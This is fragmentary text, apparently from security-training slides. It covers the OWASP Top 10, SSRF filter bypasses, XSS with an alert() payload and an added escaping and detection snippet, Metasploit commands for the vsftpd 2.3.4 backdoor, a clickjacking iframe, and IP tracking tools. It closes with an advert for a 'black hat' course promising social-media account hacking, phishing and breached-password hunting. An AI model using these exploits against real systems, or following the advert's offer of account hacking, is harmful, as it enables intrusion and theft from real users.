was previously titled Using Components with Known Vulnerabilities and is #2 in the Top 10 community survey, but also had enough data to make the Top 10 via data analysis. This category moves up from #9 in 2017 and is a known issue that we struggle to test and assess …

Identification and Authentication Failures
was previously Broken Authentication and is sliding down from the second position, and now includes CWEs that are more related to identification failures. This category is still an integral part of the Top 10, but the increased availability of standardized frameworks seems to be helping.

Software and Data Integrity Failures
is a new category for 2021, focusing on making assumptions related to software updates, critical data, and CI/CD pipelines without verifying integrity. One of the highest …

Security Logging and Monitoring Failures
was previously Insufficient Logging & Monitoring and is added from the industry survey (#3), moving up from #10 previously. This category is expanded to include …

Server-Side Request Forgery
is added from the Top 10 community survey (#1). The data shows a relatively low incidence rate with above average testing coverage, along with above-average ratings for …
SERVER-SIDE REQUEST FORGERY
Basic SSRF against the local server
Basic SSRF against another back-end system
SSRF with blacklist-based input filter
SSRF with whitelist-based input filter
Bypassing SSRF filters via open redirection

Server-side request forgery (also known as SSRF) is a web security vulnerability that allows an attacker to induce the server-side application to make HTTP requests to an arbitrary domain of the attacker's choosing. In a typical SSRF attack, the attacker might cause the server to make a connection to internal-only services within the organization's infrastructure. In other cases, they may be able to force the server to connect to arbitrary external systems, potentially leaking sensitive data such as authorization credentials.

Basic SSRF against the local server
Why do applications behave in this way, and implicitly trust requests that come from the local machine? This can arise for various reasons:

Basic SSRF against another back-end system
It is common to see applications containing SSRF behavior together with defenses aimed at preventing malicious exploitation. Often, these defenses can be circumvented.

SSRF with whitelist-based input filter
Some applications only allow input that matches, begins with, or contains, a whitelist of permitted values. In this situation, you can sometimes circumvent the filter by exploiting inconsistencies in URL parsing.

Bypassing SSRF filters via open redirection
It is sometimes possible to circumvent any kind of filter-based defenses by exploiting an open redirection vulnerability
Business logic Vulnerabilities
Price Tampering
Excessive trust in client-side controls
High-level logic vulnerability

Business logic Vulnerabilities
In this section, we'll introduce the concept of business logic vulnerabilities and explain how they can arise due to flawed assumptions about user behavior. We'll discuss the potential impact of logic flaws and teach you how they can be exploited. You can also practice what you've learned using our interactive labs, which are based on real bugs that we've encountered in the wild. Finally, we'll provide some general best practices to help you prevent these kinds of logic flaws arising in your own applications.

Price Tampering
Hence, web parameter tampering attack is possible by manipulating the price using a simple web proxy tool (Tamper data, burpsuite etc.) or by editing the amount using the browser's web inspector tool. Notice the form field called price, which is flagged as hidden.
BRUTE FORCE ATTACK
A simple brute force attack uses automation and scripts to guess passwords. Typical brute force attacks make a few
hundred guesses every second. Simple passwords, such as those lacking a mix of upper- and lowercase letters and
those using common expressions like '123456' or 'password,' can be cracked in minutes.

All In One Attack


➢ In cryptography, a brute-force attack
consists of an attacker submitting many
passwords or passphrases with the hope of
eventually guessing correctly. The attacker
systematically checks all possible passwords
and passphrases until the correct one is
found.
CROSS SITE SCRIPTING (XSS)
How does XSS work?
Cross-site scripting works by manipulating a vulnerable web site so that it returns malicious JavaScript to users. When the malicious code executes inside a victim's browser, the attacker can fully compromise their interaction with the application.

XSS proof of concept
➢ You can confirm most kinds of XSS vulnerability by injecting a payload that causes your own browser to execute some arbitrary JavaScript. It's long been common practice to use the alert() function for this purpose because it's short, harmless, and pretty hard to miss when it's successfully called. In fact, you solve the majority of our XSS labs by invoking alert() in a simulated victim's browser.
➢ Unfortunately, there's a slight hitch if you use Chrome. From version 92 onward (July 20th, 2021), cross-origin iframes are prevented from calling alert(). As these are used to construct some of the more advanced XSS attacks, you'll sometimes need to use an alternative PoC payload. In this scenario, we recommend the print() function. If you're interested in learning more about this change and why we like print(),
➢ As the simulated victim in our labs uses Chrome, we've amended the affected labs so that they can also be solved using print(). We've indicated this in the instructions wherever relevant.
What are the types of XSS attacks?
➢ Reflected XSS, where the malicious script comes from the current HTTP request.
➢ Stored XSS, where the malicious script comes from the website's database.
➢ DOM-based XSS, where the vulnerability exists in client-side code rather than server-side code.

Reflected cross-site scripting
➢ Reflected XSS is the simplest variety of cross-site scripting. It arises when an application receives data in an HTTP request and includes that data within the immediate response in an unsafe way.

Stored cross-site scripting
➢ The data in question might be submitted to the application via HTTP requests; for example, comments on a blog post, user nicknames in a chat room, or contact details on a customer order. In other cases, the data might arrive from other untrusted sources;..

DOM-based cross-site scripting
➢ In the following example, an application uses some JavaScript to read the value from an input field and write that value to an element within the HTML:

<script>alert(1)</script>
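The DOM-based pattern described above, as an added example (JavaScript written for this page, not code from the course or from the XSS text it quotes): the vulnerable HTML sink next to two defences, modelled as pure functions so it runs outside a browser. The "search" field, the helper names and the heuristic detector are assumptions.

```javascript
// Added example for this page (not course material). Models the DOM-based XSS
// pattern above: JavaScript reads a value from an input field and writes it
// into the page. Helper names and the "search" field are assumptions.

// Vulnerable sink. In the browser this string would be assigned to
// results.innerHTML, so any markup in `search` is parsed and executed.
function buildResultsUnsafe(search) {
  return 'You searched for: ' + search;
}

// Defence 1: HTML-encode the untrusted value before it reaches an HTML sink.
const HTML_ESCAPES = {
  '&': '&amp;', '<': '&lt;', '>': '&gt;', '"': '&quot;', "'": '&#39;'
};
function escapeHtml(value) {
  return String(value).replace(/[&<>"']/g, (ch) => HTML_ESCAPES[ch]);
}
function buildResultsSafe(search) {
  return 'You searched for: ' + escapeHtml(search);
}

// Defence 2: prefer a text sink. textContent stores the string verbatim and
// never hands it to the HTML parser, so no encoding step is needed.
// `resultsEl` is any object with a textContent property (a DOM element in
// the browser; a plain object in the test below).
function renderResultsAsText(resultsEl, search) {
  resultsEl.textContent = 'You searched for: ' + search;
  return resultsEl.textContent;
}

// Heuristic detector for code review or logging: does the markup about to be
// written contain a tag or an inline event-handler attribute the application
// never intended to emit? Useful as a test assertion, not as a sanitizer.
function looksLikeMarkupInjection(html) {
  return /<\s*\/?\s*[a-z][\w-]*|\bon[a-z]+\s*=/i.test(html);
}

// Constructed sample input: the proof-of-concept payload shown on this page.
const SAMPLE_PAYLOAD = '<script>alert(1)</script>';

// Stand-alone demonstration.
console.log('unsafe :', buildResultsUnsafe(SAMPLE_PAYLOAD));
console.log('escaped:', buildResultsSafe(SAMPLE_PAYLOAD));
console.log('flagged:', looksLikeMarkupInjection(buildResultsUnsafe(SAMPLE_PAYLOAD)));
```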
Insecure Direct Object Reference (IDOR)
➢ Insecure direct object references (IDOR) are a type of access control vulnerability that arises when an application uses user-supplied input to access objects directly. The term IDOR was popularized by its appearance in the OWASP 2007 Top Ten. However, it is just one example of many access control implementation mistakes that can lead to access controls being circumvented. IDOR vulnerabilities are most commonly associated with horizontal privilege escalation, but they can also arise in relation to vertical privilege escalation.
➢ There are many examples of access control vulnerabilities where user-controlled parameter values are used to access resources or functions directly.
FULL PATH DISCLOSURE (FPD)
Full Path Disclosure (FPD) vulnerabilities enable the attacker to see the path to the webroot/file. e.g.: /home/omg/htdocs/file/. Certain vulnerabilities, such as using the load_file() (within a SQL Injection) query to view the page source, require the attacker to have the full path to the file they wish to view.

Dirsearch : Directory Search
➢ Our next tool in the line is dirsearch. As the name suggests it is a simple command-line tool that can be used to brute force the directories. It is much faster than the traditional DIRB:

DirBuster : Directory Search
➢ This project is a fork of the original DirBuster project. The original DirBuster project is inactive. However, OWASP ZAP team forked it and built a Forced Browse add-on which can be loaded into ZAP. I have added the necessary library files so that you can play with it directly.

DIRB: Web Fuzzer
➢ DIRB is a Web Content Scanner. It looks for existing (and/or hidden) Web Objects. It basically works by launching a dictionary based attack against a web server and analyzing the response.


VSFTPD V2.3.4 BACKDOOR COMMAND EXECUTION
This module exploits a malicious backdoor that was added to the VSFTPD download archive. This backdoor was introduced into the vsftpd-2.3.4.tar.gz archive between June 30th 2011 and July 1st 2011 according to the most recent information available. This backdoor was removed on July 3rd 2011.

FTP Exploit Reverse Shell
An exploit (from the English verb to exploit, meaning "to use something to one’s own advantage") is a piece of software, a chunk of data, or a sequence of commands that takes advantage of a bug or vulnerability to cause unintended or unanticipated behavior to occur on computer software, hardware, or something electronic (usually computerized).[1] Such behavior frequently includes things like gaining control of a computer system, allowing privilege escalation, or a denial-of-service (DoS or related DDoS) attack.

FTP Exploit Metasploit
➢ msf > use exploit/unix/ftp/vsftpd_234_backdoor
➢ msf exploit(vsftpd_234_backdoor) > show targets
➢ ...targets...
➢ msf exploit(vsftpd_234_backdoor) > set TARGET < target-id >
➢ msf exploit(vsftpd_234_backdoor) > show options
➢ ...show and set options...
➢ msf exploit(vsftpd_234_backdoor) > exploit
CLICKJACKING
Clickjacking is an interface-based attack in which a user is tricked into clicking on actionable
content on a hidden website by clicking on some other content in a decoy website. Consider the
following example:

Clickjacking Bug
Clickjacking is an attack that fools users into
thinking they are clicking on one thing when they
are actually clicking on another. Its other name,
user interface (UI) redressing, better describes
what is going on. Users think they are using a web
page’s normal UI, but in fact there is a hidden UI in
control; in other words, the UI has been redressed.
When users click something they think is safe, the
hidden UI performs a different action.

<iframe src="https://google.com" width="800" height="800"></iframe>
SSL | HTTPS | HOW TO SETUP
Secure Sockets Layer (SSL) is a security protocol that provides privacy, authentication, and integrity to Internet communications. SSL eventually evolved into Transport Layer Security (TLS).

HTTP VS HTTPS
Http To HTTPS Website

In order to provide a high degree of privacy, SSL encrypts data that is transmitted across the web. This means that anyone who tries to intercept this data will only see a garbled mix of characters that is nearly impossible to decrypt.

[Diagram: User, Insecure Connection, Normal HTTP; User, Encrypted Connection, Secure HTTPS]
WORDPRESS WEB APPLICATION FIREWALL (WAF)
The WordPress Firewall is a cloud-based WAF that stops website hacks and attacks. Our constant
research improves detection and mitigation of evolving threats, and you can add your own custom
rules.

Firewall Security Setup


➢ A Firewall is a network security device
that monitors and filters incoming and
outgoing network traffic based on an
organization's previously established
security policies. At its most basic, a
firewall is essentially the barrier that sits
between a private internal network and
the public Internet
POC | PROOF OF CONCEPT | PIECE OF CODE
Proof of concept, also known as proof of principle, is a realization of a certain method or idea in
order to demonstrate its feasibility, or a demonstration in principle with the aim of verifying that
some concept or theory has practical potential. A proof of concept is usually small and may or may
not be complete.

Proof of Concept Piece of Code


WEB RTC REAL-TIME COMMUNICATION
Anonymous Identity
WebRTC is supported by the following browsers: Chrome, Opera, Edge, Firefox etc.

With WebRTC, you can add real-time communication capabilities to your application that work on top of an open standard. It supports video, voice, and generic data to be sent between peers, allowing developers to build powerful voice- and video-communication solutions. The technology is available on all modern browsers as well as on native clients for all major platforms.

There are many different use-cases for WebRTC, from basic web apps that use the camera or microphone, to more advanced video-calling applications and screen sharing. We have gathered a number of code samples to better illustrate how the technology works and what you can use it for.
IDENTITY SYSTEM
Browser Fingerprinting
A device fingerprint or machine fingerprint is information collected about the software and hardware of a remote computing device for the purpose of identification. The information is usually assimilated into a brief identifier using a fingerprinting algorithm.

User Agent Browser
In computing, a user agent is any software, acting on behalf of a user, which "retrieves, renders and facilitates end-user interaction with Web content." A user agent is therefore a special kind of software agent. Some prominent examples of user agents are web browsers and email readers.
TOR BROWSER
Anonymous Identity
Defend yourself
Tor Browser isolates each website you visit so third-
party trackers and ads can't follow you. Any cookies
automatically clear when you're done browsing. So
will your browsing history.

Tor Browser prevents someone watching your


connection from knowing what websites you visit.
All anyone monitoring your browsing habits can see
is that you're using Tor.
LOCATION TRACKING
Location tracking refers to technologies that physically locate and electronically record and track the movement of people or objects. Location tracking technology is in use every day with GPS navigation, locations located on digital pictures and searching for businesses nearby using common apps.

IPLogger
IP Logger is a URL Shortener with advanced analytics for the traffic through your links, visitors on your blog, forum or website. With the help of our services, you can find your IP address, find location of IP address, and track the exa….

Canarytokens
Canarytokens is a free tool that helps you discover you've been breached by having attackers announce themselves. The tokens allow you to implant traps

Find My Device
Find My Device easily lets you remotely track, lock, and erase the data on a lost or stolen phone. You can also see the battery life remaining on your phone and the Wi-Fi network it is connected to. There are other ways to track a lost Android phone,
CV DESIGN
HOW TO APPLY FOR A JOB IN LINKEDIN
BLACK HAT HACKING
(BHH)
We have another very important course where you can learn black hat hacking
and take your skills a step further.

The topics of this course are:-


Broadband Internet Hacking
Facebook Database Access on
Dark Web | Tor Project
Social Media Hacking | Social
Engineering Attack Phishing
Hunting Breached Passwords

Register Now : Book Now


THANK YOU
WWW.DROP.ORG.IN